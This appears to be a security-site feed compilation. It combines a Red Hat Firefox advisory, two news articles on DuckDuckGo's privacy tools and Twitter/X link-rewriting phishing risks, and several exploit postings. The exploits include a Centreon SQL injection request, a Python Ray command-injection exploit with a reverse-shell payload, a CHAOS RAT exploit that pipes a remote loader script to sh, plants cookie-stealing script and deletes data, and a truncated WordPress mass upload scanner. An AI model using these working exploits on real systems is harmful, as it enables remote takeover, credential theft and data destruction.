Red Hat Security Advisory 2024-1904-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1904.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:1904-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1904Issue date:         2024-04-18Revision:           03CVE Names:          CVE-2024-2609====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.10.0 ESR.Security Fix(es):  * GetBoundName in the JIT returned the wrong object (CVE-2024-3852)* Out-of-bounds-read after mis-optimized switch statement (CVE-2024-3854)* Incorrect JITting of arguments led to use-after-free during garbage collection (CVE-2024-3857)* Permission prompt input delay could expire when not in focus (CVE-2024-2609)* Integer-overflow led to out-of-bounds-read in the OpenType sanitizer (CVE-2024-3859)* Potential use-after-free due to AlignedBuffer self-move (CVE-2024-3861)* Memory safety bug fixed in Firefox 125, Firefox ESR 115.10, and Thunderbird 115.10 (CVE-2024-3864)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-2609References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2275547https://bugzilla.redhat.com/show_bug.cgi?id=2275549https://bugzilla.redhat.com/show_bug.cgi?id=2275550https://bugzilla.redhat.com/show_bug.cgi?id=2275551https://bugzilla.redhat.com/show_bug.cgi?id=2275552https://bugzilla.redhat.com/show_bug.cgi?id=2275553https://bugzilla.redhat.com/show_bug.cgi?id=2275555

Red Hat Security Advisory 2024-1904-03

Centreon version 23.10-1.el8 suffers from a remote authenticated SQL injection vulnerability.

    ;; Postauth SQL Injection in Centreon 23.10-1.el8;; by code610;; ;; found : 05.03.2024;; version: centreon-vbox-vm-23_10-1.el8.zip;; details: https://code610.blogspot.com/2024/04/postauth-sqli-in-centreon-2310-1el8.html;; ;; sqlmap request.txtPOST /centreon/main.get.php?p=60201 HTTP/1.1Host: 192.168.56.156User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 2529Origin: http://192.168.56.156Connection: keep-aliveReferer: http://192.168.56.156/centreon/main.get.php?p=60201&o=aCookie: PHPSESSID=dvipe1o0so6gcg52gkgcrg2avhUpgrade-Insecure-Requests: 1service_description=2222222222xxxxxxxx22&service_hPars%5B%5D='%3e%22%3e%3csvg%2fonload%3dprompt(123)%3e&service_template_model_stm_id=83&command_command_id=134&macroInput%5B0%5D=MODE&macroValue%5B0%5D=connection-time&macroFrom%5B0%5D=fromTpl&macroTplValue_0=connection-time&macroOriginalName_0=&macroTplValToDisplay_0=1&macroDescription_0=&macroTpl_0=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_0=connection-time&isFrozen_0=0&clone_order_macro_0=&macroInput%5B1%5D=WARNING&macroValue%5B1%5D=1000&macroFrom%5B1%5D=fromTpl&macroTplValue_1=1000&macroOriginalName_1=&macroTplValToDisplay_1=1&macroDescription_1=&macroTpl_1=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_1=1000&isFrozen_1=0&clone_order_macro_1=&macroInput%5B2%5D=CRITICAL&macroValue%5B2%5D=5000&macroFrom%5B2%5D=fromTpl&macroTplValue_2=5000&macroOriginalName_2=&macroTplValToDisplay_2=1&macroDescription_2=&macroTpl_2=Service+template+%3A+App-DB-MySQL-Connection-Time&macroOldValue_2=5000&isFrozen_2=0&clone_order_macro_2=&timeperiod_tp_id=1&service_max_check_attempts=&service_normal_check_interval=&service_retry_check_interval=&service_active_checks_enabled%5Bservice_active_checks_enabled%5D=2&service_passive_checks_enabled%5Bservice_passive_checks_enabled%5D=2&service_is_volatile%5Bservice_is_volatile%5D=2&service_notifications_enabled%5Bservice_notifications_enabled%5D=2&service_use_only_contacts_from_host%5Bservice_use_only_contacts_from_host%5D=0&service_notification_interval=&timeperiod_tp_id2=&service_first_notification_delay=&service_recovery_notification_delay=&service_obsess_over_service%5Bservice_obsess_over_service%5D=2&service_acknowledgement_timeout=&service_check_freshness%5Bservice_check_freshness%5D=2&service_freshness_threshold=&service_flap_detection_enabled%5Bservice_flap_detection_enabled%5D=2&service_low_flap_threshold=&service_high_flap_threshold=&service_retain_status_information%5Bservice_retain_status_information%5D=2&service_retain_nonstatus_information%5Bservice_retain_nonstatus_information%5D=2&service_event_handler_enabled%5Bservice_event_handler_enabled%5D=2&command_command_id2=&command_command_id_arg2=&graph_id=&esi_notes_url=&esi_notes=&esi_action_url=&esi_icon_image=&esi_icon_image_alt=&criticality_id=&geo_coords=&service_activate%5Bservice_activate%5D=1&service_comment=&submitA=Save&macroFrom%5B%23index%23%5D=direct&service_id=&service_register=1&p=60201&o=a&initialValues=a%3A0%3A%7B%7D&select=&argChecker=1&macChecker=1&centreon_token=0e87a8f24318f5221765b62c09cb10bf;; --- ;; init response:        <a href="main.php?p=60201"             class="pathWay">Services by host</a>        </div>SQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not definedSQLSTATE[HY093]: Invalid parameter number: parameter was not defined<br /><b>Fatal error</b>:  Uncaught PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"><svg/onload=prompt(123)>' AND hsr.service_service_id = service_id AND servi...' at line 1 in /usr/share/centreon/www/class/centreonDB.class.php:311Stack trace:#0 /usr/share/centreon/www/class/centreonDB.class.php(311): PDO->query()#1 /usr/share/centreon/www/include/configuration/configObject/service/DB-Func.php(281): CentreonDB->query()#2 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/Rule/Callback.php(57): testServiceExistence()#3 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm/RuleRegistry.php(130): HTML_QuickForm_Rule_Callback->validate()#4 /usr/share/centreon/vendor/openpsa/quickform/lib/HTML/QuickForm.php(1315): HTML_QuickForm_RuleRegistry->validate()#5 /usr/share/centreon/www/include/configuration/configObject/service/formService.php(1156): HTML_QuickForm->validate()#6 /usr/share/centreon/www/include/configuration/configObject/service/serviceByHost.php(127): require_once('...')#7 /usr/share/centreon/www/main.get.php(304): include_once('...')#8 {main}  thrown in <b>/usr/share/centreon/www/class/centreonDB.class.php</b> on line <b>311</b><br />;; --- ;; More:;;   https://code610.blogspot.com;;   https://twitter.com/CodySixteen;; ;; cheers;;

Centreon 23.10-1.el8 SQL Injection

The Ray Project dashboard contains a CPU profiling page, and the format parameter is not validated before being inserted into a system command executed in a shell, allowing for arbitrary command execution. If the system is configured to allow passwordless sudo (a setup some Ray configurations require) this will result in a root shell being returned to the user. If not configured, a user level shell will be returned. Versions 2.6.3 and below are affected.

    # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)# Description:#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is#  not validated before being inserted into a system command executed in a shell, allowing#  for arbitrary command execution. If the system is configured to allow passwordless sudo#  (a setup some Ray configurations require) this will result in a root shell being returned#  to the user. If not configured, a user level shell will be returned# Version: <= 2.6.3# Date: 2024-4-10# Exploit Author: Fire_Wolf# Tested on: Ubuntu 20.04.6 LTS# Vendor Homepage: https://www.ray.io/# Software Link: https://github.com/ray-project/ray# CVE: CVE-2023-6019# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe# ==========================================================================================# !usr/bin/python3# coding=utf-8import base64import argparseimport requestsimport urllib3proxies = {"http": "127.0.0.1:8080"}headers = {    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}def check_url(target, port):    target_url = target + ":" + port    https = 0    if 'http' not in target:        try:            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)            test_url = 'http://' + target_url            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)            if response.status_code != 200:                is_https = 0                return is_https        except Exception as e:            print("ERROR! The Exception is:" + format(e))    if https == 1:        return "https://" + target_url    else:        return "http://" + target_urldef exp(target,ip,lhost, lport):    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''    print("[*]Payload is: " + payload)    b64_payload = base64.b64encode(payload.encode())    print("[*]Base64 encoding payload is: " + b64_payload.decode())    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)    print(exp_url)    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)    response = requests.get(url=exp_url, headers=headers, verify=False)    if response.status_code == 200:        print("[-]ERROR: Exploit Failed,please check the payload.")    else:        print("[+]Exploit is finished,please check your machine!")if __name__ == '__main__':    parser = argparse.ArgumentParser(        description='''         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃                                                    ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄        ''',        formatter_class=argparse.RawDescriptionHelpFormatter,    )    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')    args = parser.parse_args()    # target = args.target    ip = args.target    # port = args.port    # lhost = args.lhost    # lport = args.lport    targeturl = check_url(args.target, args.port)    print(targeturl)    print("[*] Checking in url: " + targeturl)    exp(targeturl, ip, args.lhost, args.lport)

Ray OS 2.6.3 Command Injection

Privacy-focused company DuckDuckGo is launching a tool to remove data from people-search websites, a VPN, and an identity theft restoration service.

For more than a decade, DuckDuckGo has rallied against Google’s extensive online tracking. Now the privacy-focused web search and browser company has another target in its sights: the sprawling, messy web of data brokers that collect and sell your data every single day.

Today, DuckDuckGo is launching a new browser-based tool that automatically scans data broker websites for your name and address and requests that they be removed. Gabriel Weinberg, the company’s founder and CEO, says the personal-information-removal product is the first of its kind where users don’t have to submit any of their details to the tool’s owners. The service will make the requests for information to be removed and then continually check if new records have been added, Weinberg says. “We’ve been doing it to automate it completely end-to-end, so you don't have to do anything.

The personal-information removal is part of DuckDuckGo’s first subscription service, called Privacy Pro, and is bundled with the firm’s first VPN and an identity-theft-restoration service. Weinberg says the subscription offering, which is initially available only in the US for $9.99 per month or $99.99 per year, is part of an effort to add to the privacy-focused tools it provides within its web browser and search engine. “There’s only so much we can do in that browsing loop, there's things happening outside of that, and a big one is data brokers, selling information scraped from different places,” Weinberg says.

The data broker industry is a far-reaching, $200-plus billion market, which collects, buys, and sells as much information as it can. A lack of comprehensive privacy laws in the US allows companies to easily trade everything from people’s names and addresses to financial data and specific GPS coordinates gathered from your phone. (The recently proposed American Privacy Rights Act, if passed, would create a new registry of data brokers and give people some European-style privacy rights).

DuckDuckGo’s personal-information-removal tool—for now, at least—is taking the privacy fight to people-search websites, which allow you to look up names, addresses, and some details of family members. However, Weinberg says DuckDuckGo has created it so the company isn’t gathering details about you, and it is built on technology from Removaly, which the company acquired in 2022.

Ahead of its launch, the company demonstrated how the system works and some of the engineering efforts that went into its creation. On the surface, the removal tool is straightforward: You access it through the company’s browser and enter some information about yourself, such as your name, year of birth, and any addresses. It then scans 53 data broker websites for results linked to you and requests those results to be wiped. (All 53 data brokers included have opt-out schemes that allow people to make requests.) A dashboard shows updates about what has been removed and when it will next scan those websites again, in case new records have been added.

Under the hood, things are more complex. Greg Fiorentino, a product director at DuckDuckGo, says when you enter your personal data into the system, it’s all saved in an encrypted database on your computer (the tool doesn’t work on mobile), and the company isn’t sent this information. “It doesn't go to DuckDuckGo servers at all," he says.

For each of the data brokers’ websites, Fiorentino says, DuckDuckGo looked at its URL structure: For instance, search results may include the name, location, and other personal information that are queried. When the personal information tool looks for you on these websites, it constructs a URL with the details you have entered.

“Each of the 53 sites we cover has a slightly different structure,” Fiorentino says. “We have a template URL string that we substitute the data in from the user to search. There are lots of different nuances and things that we need to be able to handle to actually match the data correctly.”

During testing, the company says, it found most people have between 15 and 30 records on the data broker sites it checks, although the highest was around 150. Weinberg says he added six addresses to be removed from websites. “I found hits on old stuff, and even in the current address, which I really tried to hide a bit from getting spam at, it’s still out there somehow,” Weinberg says. “It’s really hard to avoid your information getting out there.”

Once the scan for records has been completed, the DuckDuckGo system, using a similar deconstruction of each of the data broker websites, will then automatically make requests for the records to be removed, the team working on the product say. Fiorentino says some opt-outs will happen within hours, whereas others can take weeks to remove the data. The product director says that in the future, the tool may be able to remove data from more websites, and the company is looking at potentially including more sensitive data in the opt-outs, such as financial information.

Various personal-information-removal services exist on the web, and they can vary in what they remove from websites or the services they provide. Not all are trustworthy. Recently, Mozilla, the creator of the Firefox browser, stopped working with identity protection service Onerep after investigative journalist Brian Krebs revealed that the founder of Onerep also founded dozens of people-search websites in recent years.

DuckDuckGo’s subscription service marks the first time the company has started charging for a product—its browser and search engine are free to use, and the firm makes its money from contextual ads. Weinberg says that, because subscriptions are purchased through Apple’s App Store, Google Play, or with payment provider Stripe, details about who subscribes are not transferred to DuckDuckGo’s servers. A random ID is created for each user when they sign up, so people don’t have to create an account or hand DuckDuckGo their payment information. The company says it doesn’t have access to people’s Apple IDs or Google account details.

For its identity-theft-restoration service, DuckDuckGo says it is working with identity protection service Iris, which uses trained staff to help with fraudulent banking activity, document replacement, emergency travel, and more. DuckDuckGo says no information is shared between it and Iris.

Weinberg says that while the company’s main focus is providing free and easy-to-use privacy tools to people, running a VPN and the removal tool requires a different business model. “It just takes a lot of bandwidth,” he says of the VPN.

Broadly, the VPN industry, which allows people to hide their web traffic from internet providers and avoid geographic restrictions on streaming, has historically been full of companies with questionable records when it comes to privacy and people’s data. Free VPNs have long been a privacy nightmare.

DuckDuckGo says its VPN, which it built in-house and which uses the WireGuard protocol, does not store any logs of people’s activities and can be used on up to five devices at once. “We don’t have any record of website visits, DNS requests, IP addresses connected, or session lengths,” the company says in its documentation. The VPN runs through its browser, with 13 location options at launch, but shields all internet traffic passing through your phone or computer.

The company says it is conducting a third-party audit of the VPN to allow its claims to be scrutinized, and it will publish the full audit once it’s complete. “We really wanted to do something in the VPN space for a long time, we just didn't have the resources and people to do it,” Weinberg says. “We looked at partnering in different places. If we have to completely trust a partner versus building something where we can make it anonymous, we decided we would want to do it ourselves.”

DuckDuckGo Is Taking Its Privacy Fight to Data Brokers

CHAOS RAT web panel version 5.0.1 is vulnerable to command injection, which can be triggered from a cross site scripting attack, allowing an attacker to takeover the RAT server.

    # Exploit Title: CHAOS RAT v5.0.1 RCE# Date: 2024-04-05# Exploit Author: @_chebuya# Software Link: https://github.com/tiagorlampert/CHAOS# Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS# CVE: CVE-2024-30850, CVE-2024-31839# Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server# Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc# Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/import timeimport requestsimport threadingimport jsonimport websocketimport http.clientimport argparseimport sysimport refrom functools import partialfrom http.server import BaseHTTPRequestHandler, HTTPServerclass Collector(BaseHTTPRequestHandler):    def __init__(self, ip, port, target, command, video_name, *args, **kwargs):        self.ip = ip        self.port = port        self.target = target        self.shell_command = command        self.video_name = video_name         super().__init__(*args, **kwargs)    def do_GET(self):        if self.path == "/loader.sh":            self.send_response(200)            self.end_headers()            command = str.encode(self.shell_command)            self.wfile.write(command)        elif self.path == "/video.mp4":            with open(self.video_name, 'rb') as f:                self.send_response(200)                self.send_header('Content-type', 'video/mp4')                self.end_headers()                self.wfile.write(f.read())        else:            cookie = self.path.split("=")[1]            self.send_response(200)            self.end_headers()            self.wfile.write(b"")            background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))            background_thread.start()def convert_to_int_array(string):    int_array = []    for char in string:        int_array.append(ord(char))    return int_arraydef extract_client_info(path):    with open(path, 'rb') as f:        data = str(f.read())    address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"    address_pattern = re.compile(address_regexp)    address = address_pattern.findall(data)[0].split("=")[1]    port_regexp = r"main\.Port=\d{1,6}"    port_pattern = re.compile(port_regexp)    port = port_pattern.findall(data)[0].split("=")[1]    jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"    jwt_pattern = re.compile(jwt_regexp)    jwt = jwt_pattern.findall(data)[0].split("=")[1]    return f"{address}:{port}", jwtdef keep_connection(target, cookie, hostname, username, os_name, mac, ip):    print("Spoofing agent connection")    headers = {            "Cookie": f"jwt={cookie}"    }    while True:        data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}        r = requests.get(f"http://{target}/health", headers=headers)        r = requests.post(f"http://{target}/device", headers=headers, json=data)        time.sleep(30)def handle_command(target, cookie, mac, ip, port):    print("Waiting to serve malicious command outupt")    headers = {        "Cookie": f"jwt={cookie}",        "X-Client": mac    }    ws = websocket.WebSocket()    ws.connect(f'ws://{target}/client', header=headers)    while True:        response = ws.recv()        command = json.loads(response)['command']        data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}        ws.send_binary(json.dumps(data))def run_exploit(cookie, target, ip, port):    print(f"Exploiting {target} with JWT {cookie}")    conn = http.client.HTTPConnection(target)    headers = {        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',        'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',        'Cookie': f'jwt={cookie}'    }    conn.request(        'POST',        '/generate',        f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',        headers    )def run(ip, port, target, command, video_name):    server_address = (ip, int(port))    collector = partial(Collector, ip, port, target, command, video_name)    httpd = HTTPServer(server_address, collector)    print(f'Server running on port {ip}:{port}')    httpd.serve_forever()if __name__ == "__main__":    parser = argparse.ArgumentParser()    subparsers = parser.add_subparsers(dest="option")    exploit = subparsers.add_parser("exploit")    exploit.add_argument("-f", "--file",  help="The path to the CHAOS client")    exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")    exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")    exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")    exploit.add_argument("-j", "--jwt", help="The JWT token to use")    exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)    exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)    exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")    exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")    exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")    exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")    exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")    extract = subparsers.add_parser("extract")    extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)    args = parser.parse_args()    if args.option == "exploit":        if args.target != None and args.jwt != None:            target = args.target            jwt = args.jwt        elif args.file != None:            target, jwt = extract_client_info(args.file)        else:            exploit.print_help(sys.stderr)            sys.exit(1)        bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))        bg.start()        cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))        cmd.start()        server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))        server.start()    elif args.option == "extract":        target, jwt = extract_client_info(args.file)        print(f"CHAOS server: {target}\nJWT: {jwt}")    else:        parser.print_help(sys.stderr)        sys.exit(1)

CHAOS RAT 5.0.1 Remote Command Execution

Joomla SP Page Builder component version 5.2.7 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : SP Page Builder 5.2.7 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               || # Vendor    : https://extensions.joomla.org/extension/sp-page-builder/                                                           |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 <===== inject here[+] http://127.0.0.1/cdgi36fr/index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Joomla SP Page Builder 5.2.7 SQL Injection

On April 9, Twitter/X began automatically modifying links that mention "twitter.com" to redirect to "x.com" instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links -- such as fedetwitter[.]com, which is currently rendered as fedex.com in tweets.

On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links — such as **fedetwitter\[.\]com**, which until very recently rendered as **fedex.com** in tweets.

The message displayed when one visits carfatwitter.com, which Twitter/X displayed as carfax.com in tweets and messages.

A search at DomainTools.com shows at least 60 domain names have been registered over the past two days for domains ending in “twitter.com,” although research so far shows the majority of these domains have been registered “defensively” by private individuals to prevent the domains from being purchased by scammers.

Those include **carfatwitter.com**, which Twitter/X truncated to carfax.com when the domain appeared in user messages or tweets. Visiting this domain currently displays a message that begins, “Are you serious, X Corp?”

**Update:** It appears Twitter/X has corrected its mistake, and no longer truncates any domain ending in “twitter.com” to “x.com.”

_Original story:_

The same message is on other newly registered domains, including **goodrtwitter.com** (goodrx.com), **neobutwitter.com** (neobux.com), **roblotwitter.com** (roblox.com), **square-enitwitter.com** (square-enix.com) and yandetwitter.com (yandex.com). The message left on these domains indicates they were defensively registered by a user on Mastodon whose bio says they are a systems admin/engineer. That profile has not responded to requests for comment.

A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan. The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

The domain mentioned at the beginning of this story — fedetwitter.com — redirects users to the blog of a Japanese technology enthusiast. A user with the handle “amplest0e” appears to have registered **space-twitter.com**, which Twitter/X users would see as the CEO’s “space-x.com.” The domain “ametwitter.com” already redirects to the real americanexpress.com.

Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registration records. Those include **firefotwitter\[.\]com** (firefox.com), **ngintwitter\[.\]com** (nginx.com), and **webetwitter\[.\]com** (webex.com).

The domain setwitter.com, which Twitter/X until very recently rendered as “sex.com,” redirects to this blog post warning about the recent changes and their potential use for phishing.

**Sean McNee**, vice president of research and data at DomainTools, told KrebsOnSecurity it appears Twitter/X did not properly limit its redirection efforts.

“Bad actors could register domains as a way to divert traffic from legitimate sites or brands given the opportunity — many such brands in the top million domains end in x, such as webex, hbomax, xerox, xbox, and more,” McNee said. “It is also notable that several other globally popular brands, such as Rolex and Linux, were also on the list of registered domains.”

The apparent oversight by Twitter/X was cause for amusement and amazement from many former users who have migrated to other social media platforms since the new CEO took over. **Matthew Garrett**, a lecturer at U.C. Berkeley’s School of Information, summed up the Schadenfreude thusly:

“Twitter just doing a ‘redirect links in tweets that go to x.com to twitter.com instead but accidentally do so for all domains that end x.com like eg spacex.com going to spacetwitter.com’ is not absolutely the funniest thing I could imagine but it’s high up there.”

Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url 